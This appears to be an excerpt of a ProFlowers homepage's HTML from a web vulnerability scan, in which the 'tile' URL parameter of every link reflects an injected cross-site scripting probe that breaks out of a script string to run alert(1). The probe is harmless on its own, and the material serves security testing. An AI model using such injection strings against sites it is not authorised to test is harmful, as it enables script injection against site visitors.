<li id="redEnvelopeLink" class="ourBrandsLi"> <a border="0" rel="nofollow" onclick="exitMVTFreeVase=false" href="http://www.redenvelope.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" target="_blank" style="height:31px;width:145px;"><img height=31px width=145px height="31px" width="145px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/TransparentPixel.gif" alt="" border="0" /></a>
...[SNIP]...
<div class="displayMoreInfo"> <a border="0" rel="nofollow" onclick="exitMVTFreeVase=false" href="http://www.redenvelope.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" target="_blank" style="height:58px;width:165px;"><img height=58px width=165px height="58px" width="165px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/RED_dropdown.gif" alt="" border="0" /></a>
...[SNIP]...
<li id="personalCreationLink" class="ourBrandsLi"> <a border="0" rel="nofollow" onclick="exitMVTFreeVase=false" href="http://www.personalcreations.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" target="_blank" style="height:31px;width:170px;"><img height=31px width=170px height="31px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/TransparentPixel.gif" alt="" border="0" /></a>
...[SNIP]...
<div class="displayMoreInfo"> <a border="0" rel="nofollow" onclick="exitMVTFreeVase=false" href="http://www.personalcreations.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" target="_blank" style="height:58px;width:165px;"><img height=58px width=165px height="58px" width="165px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/PC_dropdown.gif" alt="" border="0" /></a>
...[SNIP]...
<li id="cherryMoonFarmsLink" class="ourBrandsLi"> <a border="0" rel="nofollow" onclick="exitMVTFreeVase=false" href="http://www.cherrymoonfarms.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" target="_blank" style="height:31px;width:170px;"><img height=31px width=170px height="31px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/TransparentPixel.gif" alt="" border="0" /></a>
...[SNIP]...
<div class="displayMoreInfo"> <a border="0" rel="nofollow" onclick="exitMVTFreeVase=false" href="http://www.cherrymoonfarms.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" target="_blank" style="height:58px;width:165px;"><img height=58px width=165px height="58px" width="165px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/CMF_dropdown.gif" alt="" border="0" /></a>
...[SNIP]...
<li id="berriesLink" class="ourBrandsLi"> <a border="0" rel="nofollow" onclick="exitMVTFreeVase=false" href="http://www.berries.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" target="_blank" style="height:31px;width:130px;"><img height=31px width=130px height="31px" width="130px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/TransparentPixel.gif" alt="" border="0" /></a>
...[SNIP]...
<div class="displayMoreInfo"> <a border="0" rel="nofollow" onclick="exitMVTFreeVase=false" href="http://www.berries.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" target="_blank" style="height:58px;width:165px;"><img height=58px width=165px height="58px" width="165px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/SB_dropdown.gif" alt="" border="0" /></a>
...[SNIP]...
ctl14__homeLink" border="0" title="Go to ProFlowers Homepage" onclick="exitMVTFreeVase=false" href="http://www.proflowers.com/?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef"><img class="PFLogo" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="ProFlowers Delivery - Send Flowers, Gifts, and Plants" border="0" /></a>
...[SNIP]...
<li><a class="headerLink" href="http://www.bridesign.com" target="_blank">Wedding</a>
...[SNIP]...
<div class="rushDeliveryBox StandardSize">Need it <a id="_ctl14__ctl91__repeater__ctl0__pcHyperLink" rel="nofollow" href="http://www.floristexpress.net?refcode=XSD&amp;RefPage=PFC_Category_#productgroup#_PRODUCTGROUP-bsl" target="_blank">Today</a>
...[SNIP]...
<a onclick="exitMVTFreeVase=false" href="http://www.proflowers.com/radio/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef&amp;how=home"><img class="RadioIcon_Control" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/TransparentPixel.gif" alt="ProFlowers on the Radio" border="0" /></a>
...[SNIP]...
<div style="margin:0px 0 5 0;"><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/topnav.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</a> <a class="Lckdwn3_Nav_PFC_Mothers_Show" href="http://www.floristexpress.net?pfc=1&amp;refcode=MDN&amp;LinkLocation=NavBar">Mother's Day</a>
...[SNIP]...
<li class="Lckdwn3_Nav_PFC_Occasion_Show"><a class="mothersDay" href="http://www.floristexpress.net?pfc=1&amp;refcode=OMD&amp;LinkLocation=NavBar">Mother's Day - 5/8</a>
...[SNIP]...
<li><a rel="nofollow" class="floristDelivery" href="http://www.floristexpress.net?refcode=PFC&amp;LinkLocation=NavBar">Local Florist Delivery</a>
...[SNIP]...
<li style="border-bottom:none;"><a class="wedding" href="http://www.bridesign.com" target="_blank">Wedding Flowers</a>
...[SNIP]...
<li class="Lckdwn3_Nav_PFC_Flowers_Hide"><a rel="nofollow" class="floristDelivery" href="http://www.floristexpress.net?refcode=pfc&amp;LinkLocation=NavBar">Florist Delivery</a>
...[SNIP]...
<li class="Lckdwn3_Nav_PFC_Flowers_Show"><a rel="nofollow" class="floristDelivery" href="http://www.floristexpress.net?pfc=1&amp;refcode=FMD&amp;LinkLocation=NavBar">Florist Delivery</a>
...[SNIP]...
<div class="searchBarBottom"><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.05.07.2"></script><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/ucproductsearchinput.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
d="productsearchlink" rel="nofollow" type="image" onclick="exitMVTFreeVase=false" href="http://www.proflowers.com/ProductSearch.aspx?Ref=HomeNoRef&amp;productgroup=bsl" style="height:18px;width:48px;"><img class="sch_smallGoBottom sch_smallGoBottomAlt" height="18px" width="48px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
<a href="javascript:O_LC();" ><img src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/siteimages/sm_FFF_oo.gif" border="0" width="9" height="9" style="vertical-align:middle;" title="site feedback"></a>
...[SNIP]...
owers/Premium-Growers-Choice-wFREE-Vase--Chocolates-956?viewpos=1&amp;trackingpgroup=bsl&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQgrowerschoice11_VdayPremiumFrills_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="Premium Grower...s Choice w/FREE Vase &amp; Chocolates" border="0" /></a>
...[SNIP]...
"http://products.proflowers.com/flowers/Premium-Growers-Choice-wFREE-Vase--Chocolates-956?viewpos=1&amp;trackingpgroup=bsl&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
ed-Rainbow-Mothers-Day-Roses-w-Free-Green-Vase-30053783?viewpos=2&amp;trackingpgroup=bsl&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PF_11_00000000R212_VA0607_FV_W1_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="12 Long Stemmed Rainbow Mother&#39;s Day Roses w/ Free Green Vase" border="0" /></a>
...[SNIP]...
oflowers.com/flowers/12-Long-Stemmed-Rainbow-Mothers-Day-Roses-w-Free-Green-Vase-30053783?viewpos=2&amp;trackingpgroup=bsl&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
ttp://products.proflowers.com/lilies/Lilies-for-Mom-482?viewpos=3&amp;trackingpgroup=bsl&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/LLYassrtories4_pnk10_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="Lilies for Mom" border="0" /></a>
...[SNIP]...
ck="exitMVTFreeVase=false" href="http://products.proflowers.com/lilies/Lilies-for-Mom-482?viewpos=3&amp;trackingpgroup=bsl&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
s.proflowers.com/lilies/Deluxe-Mothers-Day-Lilies-41206?viewpos=4&amp;trackingpgroup=bsl&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/LLYdlxroyalspring_grn10_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="Deluxe Mother&#39;s Day Lilies" border="0" /></a>
...[SNIP]...
eeVase=false" href="http://products.proflowers.com/lilies/Deluxe-Mothers-Day-Lilies-41206?viewpos=4&amp;trackingpgroup=bsl&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
</div><a class="relatedLinks" href="http://www.floristExpress.net?refcode=RFD&amp;LinkLocation=RelatedLinks" target="_blank">Local Florist Delivery</a>
...[SNIP]...
s.proflowers.com/flowers/The-Ultimate-Office-Plant-30003767?trackingpgroup=RecentlyViewed&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:100px;width:86px;"><img height="100px" width="86px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT8inspath_wdtpr09_l?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=86&amp;hei=100" alt="The Ultimate Office Plant" border="0" /></a>
...[SNIP]...
.proflowers.com/flowers/Deluxe-Mothers-Day-Bouquet-30050137?trackingpgroup=RecentlyViewed&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:100px;width:86px;"><img height="100px" width="86px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PF_11_00000000M232_VA0606_W1_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=86&amp;hei=100" alt="Deluxe Mother...s Day Bouquet" border="0" /></a>
...[SNIP]...
tp://products.proflowers.com/flowers/Growers-Choice-962?viewpos=5&amp;trackingpgroup=bsl&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQgrowerschoice09_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="Grower&#39;s Choice" border="0" /></a>
...[SNIP]...
k="exitMVTFreeVase=false" href="http://products.proflowers.com/flowers/Growers-Choice-962?viewpos=5&amp;trackingpgroup=bsl&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
wers.com/roses/Two-Dozen-Rainbow-Mothers-Day-Roses-6103?viewpos=6&amp;trackingpgroup=bsl&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS24assrt_pnk11_2_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="Two Dozen Rainbow Mother&#39;s Day Roses" border="0" /></a>
...[SNIP]...
alse" href="http://products.proflowers.com/roses/Two-Dozen-Rainbow-Mothers-Day-Roses-6103?viewpos=6&amp;trackingpgroup=bsl&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
products.proflowers.com/lilies/Mothers-Day-Lilies-41205?viewpos=7&amp;trackingpgroup=bsl&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/LLYroyalspring_pnk10_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="Mother&#39;s Day Lilies" border="0" /></a>
...[SNIP]...
itMVTFreeVase=false" href="http://products.proflowers.com/lilies/Mothers-Day-Lilies-41205?viewpos=7&amp;trackingpgroup=bsl&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
wers.com/roses/One-Dozen-Rainbow-Mothers-Day-Roses-4539?viewpos=8&amp;trackingpgroup=bsl&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS12assrt11_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="One Dozen Rainbow Mother&#39;s Day Roses" border="0" /></a>
...[SNIP]...
alse" href="http://products.proflowers.com/roses/One-Dozen-Rainbow-Mothers-Day-Roses-4539?viewpos=8&amp;trackingpgroup=bsl&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
//products.proflowers.com/flowers/Spring-Awakenings-561?viewpos=9&amp;trackingpgroup=bsl&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQsprngawake09_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="Spring Awakenings" border="0" /></a>
...[SNIP]...
exitMVTFreeVase=false" href="http://products.proflowers.com/flowers/Spring-Awakenings-561?viewpos=9&amp;trackingpgroup=bsl&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
tp://products.proflowers.com/flowers/Moms-Delight-5566?viewpos=10&amp;trackingpgroup=bsl&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQspringblooms_pnk09_CONTROL_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="Mom&#39;s Delight" border="0" /></a>
...[SNIP]...
k="exitMVTFreeVase=false" href="http://products.proflowers.com/flowers/Moms-Delight-5566?viewpos=10&amp;trackingpgroup=bsl&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
.proflowers.com/orchids/Purple-Dendrobium-Orchids-3755?viewpos=11&amp;trackingpgroup=bsl&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQ15orchpurp10_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="Purple Dendrobium Orchids" border="0" /></a>
...[SNIP]...
eVase=false" href="http://products.proflowers.com/orchids/Purple-Dendrobium-Orchids-3755?viewpos=11&amp;trackingpgroup=bsl&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
p://products.proflowers.com//Smiles--Sunshine-30007596?viewpos=12&amp;trackingpgroup=bsl&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQrosesalstro_gv10_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="Smiles &amp; Sunshine" border="0" /></a>
...[SNIP]...
="exitMVTFreeVase=false" href="http://products.proflowers.com//Smiles--Sunshine-30007596?viewpos=12&amp;trackingpgroup=bsl&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
-Dozen-Long-Stemmed-Rainbow-Mothers-Day-Roses-30004315?viewpos=13&amp;trackingpgroup=bsl&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS24assorted50_grn10_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="Two Dozen Long Stemmed Rainbow Mother&#39;s Day Roses" border="0" /></a>
...[SNIP]...
ttp://products.proflowers.com//Two-Dozen-Long-Stemmed-Rainbow-Mothers-Day-Roses-30004315?viewpos=13&amp;trackingpgroup=bsl&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
ucts.proflowers.com/flowers/Shower-of-Flowers-30004467?viewpos=14&amp;trackingpgroup=bsl&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQshowersflowers_gv11_catalog_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="Shower of Flowers" border="0" /></a>
...[SNIP]...
TFreeVase=false" href="http://products.proflowers.com/flowers/Shower-of-Flowers-30004467?viewpos=14&amp;trackingpgroup=bsl&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
-Dozen-Long-Stemmed-Rainbow-Mothers-Day-Roses-30046443?viewpos=15&amp;trackingpgroup=bsl&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PF_11_00000000R212_VA1137_W1_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="One Dozen Long Stemmed Rainbow Mother&#39;s Day Roses" border="0" /></a>
...[SNIP]...
roducts.proflowers.com/flowers/One-Dozen-Long-Stemmed-Rainbow-Mothers-Day-Roses-30046443?viewpos=15&amp;trackingpgroup=bsl&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
ts.proflowers.com/flowers/Dozen-Hugs-Dozen-Kisses-5395?viewpos=16&amp;trackingpgroup=bsl&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQhugskisses_rbye11_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="A Dozen Hugs, a Dozen Kisses" border="0" /></a>
...[SNIP]...
reeVase=false" href="http://products.proflowers.com/flowers/Dozen-Hugs-Dozen-Kisses-5395?viewpos=16&amp;trackingpgroup=bsl&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
wers.com/flowers/50-Blooms-of-Garden-Spray-Roses-41637?viewpos=17&amp;trackingpgroup=bsl&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS15assrtspray_grn10_2_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="50 Blooms of Garden Spray Roses" border="0" /></a>
...[SNIP]...
alse" href="http://products.proflowers.com/flowers/50-Blooms-of-Garden-Spray-Roses-41637?viewpos=17&amp;trackingpgroup=bsl&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
cts.proflowers.com/roses/48-Assorted-Petite-Roses-6431?viewpos=18&amp;trackingpgroup=bsl&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS48assrtpet_purpletrmp11_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="48 Assorted Petite Roses" border="0" /></a>
...[SNIP]...
FreeVase=false" href="http://products.proflowers.com/roses/48-Assorted-Petite-Roses-6431?viewpos=18&amp;trackingpgroup=bsl&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
roducts.proflowers.com/lilies/200-Blooms-for-Mom-11146?viewpos=19&amp;trackingpgroup=bsl&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/LLYdlxassrtperu_tv11_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="200 Blooms for Mom" border="0" /></a>
...[SNIP]...
tMVTFreeVase=false" href="http://products.proflowers.com/lilies/200-Blooms-for-Mom-11146?viewpos=19&amp;trackingpgroup=bsl&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
ers.com/flowers/100-Blooms-of-Garden-Spray-Roses-41638?viewpos=20&amp;trackingpgroup=bsl&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS30assrtspray_pnk10_test_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="100 Blooms of Garden Spray Roses" border="0" /></a>
...[SNIP]...
lse" href="http://products.proflowers.com/flowers/100-Blooms-of-Garden-Spray-Roses-41638?viewpos=20&amp;trackingpgroup=bsl&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
